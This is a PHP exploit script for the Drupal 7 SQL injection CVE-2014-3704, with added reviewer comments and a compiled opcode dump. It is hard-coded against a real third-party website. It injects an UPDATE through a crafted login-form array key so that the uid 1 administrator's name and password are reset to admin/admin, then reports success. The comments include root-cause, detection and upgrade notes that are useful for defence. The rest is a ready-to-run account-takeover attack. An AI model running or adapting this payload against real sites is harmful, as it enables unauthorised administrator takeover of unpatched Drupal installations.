<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
#
# Reviewer summary: this flat script sends one unauthenticated POST to the
# login block form of a Drupal 7 site and prints a verdict based on the
# response body. Per the header above, the affected range is Drupal core 7.x
# before 7.32, so the remediation is an upgrade to 7.32 or later.

# Base URL of the Drupal site the request is sent to (hard-coded).
$url = 'http://animepavilion.com/drupal/';

# Form body. The `name` field is submitted as an array with two keys:
#   - name[0]   : an ordinary value ("test")
#   - name[0 ;…]: a key that is itself a URL-encoded SQL fragment, an UPDATE on
#                 the `users` table that sets `name` and `pass` for uid 1.
# CVE-2014-3704 is the Drupal database-layer flaw in which the keys of an array
# argument reached the query text without validation; only the values were
# bound as parameters. The root cause is therefore unvalidated array keys, not
# a missing escape on the values.
# The `pass` value is a pre-computed Drupal password hash ('$S$' prefix),
# passed through urlencode() so its '$' characters survive form encoding.
#
# Detection notes:
#   - request side: a POST with form_id=user_login_block where a `name[...]`
#     key contains spaces, ';' or SQL keywords instead of a plain index;
#   - host side: an unexpected change to the uid 1 row of `users`.
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

# Stream-context options for an HTTP POST with a form-encoded body.
$params = array(
    'http' => array(
        'method' => 'POST',
        'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
    )
);
$ctx = stream_context_create($params);

# file_get_contents() returns the response body, or false on failure.
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

# The verdict is inferred from a PHP warning string appearing in the returned
# page, so it depends on the site printing PHP warnings into its output.
# NOTE(review): absence of the string does not establish that a site is
# patched; confirm the installed core version instead.
# The trailing `&& $data` is evaluated only after stristr() has already run.
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
    echo "Success! Log in with username admin and password admin at {$url}user/login";
} else {
    echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 28, Position 2 = 29
Branch analysis from position: 28
2 jumps found. (Code = 43) Position 1 = 30, Position 2 = 35
Branch analysis from position: 30
1 jumps found. (Code = 42) Position 1 = 36
Branch analysis from position: 36
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 35
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 29
filename:       /in/c62Io
function name:  (null)
number of ops:  37
compiled vars:  !0 = $url, !1 = $post_data, !2 = $params, !3 = $ctx, !4 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   11     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fanimepavilion.com%2Fdrupal%2F'
   12     1        INIT_FCALL                                               'urlencode'
          2        SEND_VAL                                                 '%24S%24CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g'
          3        DO_ICALL                                         $6      
          4        CONCAT                                           ~7      'name%5B0%2520%3Bupdate%2Busers%2Bset%2Bname%253D%27admin%27%2B%2C%2Bpass%2B%253d%2B%27', $6
          5        CONCAT                                           ~8      ~7, '%27%2Bwhere%2Buid%2B%253D%2B%271%27%3B%3B%23%2520%2520%5D%3Dtest3%26name%5B0%5D%3Dtest%26pass%3Dtest%26test2%3Dtest%26form_build_id%3D%26form_id%3Duser_login_block%26op%3DLog%2Bin'
          6        ASSIGN                                                   !1, ~8
   16     7        INIT_ARRAY                                       ~10     'POST', 'method'
   17     8        ADD_ARRAY_ELEMENT                                ~10     'Content-Type%3A+application%2Fx-www-form-urlencoded%0D%0A', 'header'
   18     9        ADD_ARRAY_ELEMENT                                ~10     !1, 'content'
         10        INIT_ARRAY                                       ~11     ~10, 'http'
   14    11        ASSIGN                                                   !2, ~11
   21    12        INIT_FCALL                                               'stream_context_create'
         13        SEND_VAR                                                 !2
         14        DO_ICALL                                         $13     
         15        ASSIGN                                                   !3, $13
   22    16        INIT_FCALL                                               'file_get_contents'
         17        CONCAT                                           ~15     !0, '%3Fq%3Dnode%26destination%3Dnode'
         18        SEND_VAL                                                 ~15
         19        SEND_VAL                                                 null
         20        SEND_VAR                                                 !3
         21        DO_ICALL                                         $16     
         22        ASSIGN                                                   !4, $16
   24    23        INIT_FCALL                                               'stristr'
         24        SEND_VAR                                                 !4
         25        SEND_VAL                                                 'mb_strlen%28%29+expects+parameter+1+to+be+string'
         26        DO_ICALL                                         $18     
         27      > JMPZ_EX                                          ~19     $18, ->29
         28    >   BOOL                                             ~19     !4
         29    > > JMPZ                                                     ~19, ->35
   25    30    >   ROPE_INIT                                     3  ~21     'Success%21+Log+in+with+username+admin+and+password+admin+at+'
         31        ROPE_ADD                                      1  ~21     ~21, !0
         32        ROPE_END                                      2  ~20     ~21, 'user%2Flogin'
         33        ECHO                                                     ~20
         34      > JMP                                                      ->36
   27    35    >   ECHO                                                     'Error%21+Either+the+website+isn%27t+vulnerable%2C+or+your+Internet+isn%27t+working.+'
   28    36    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

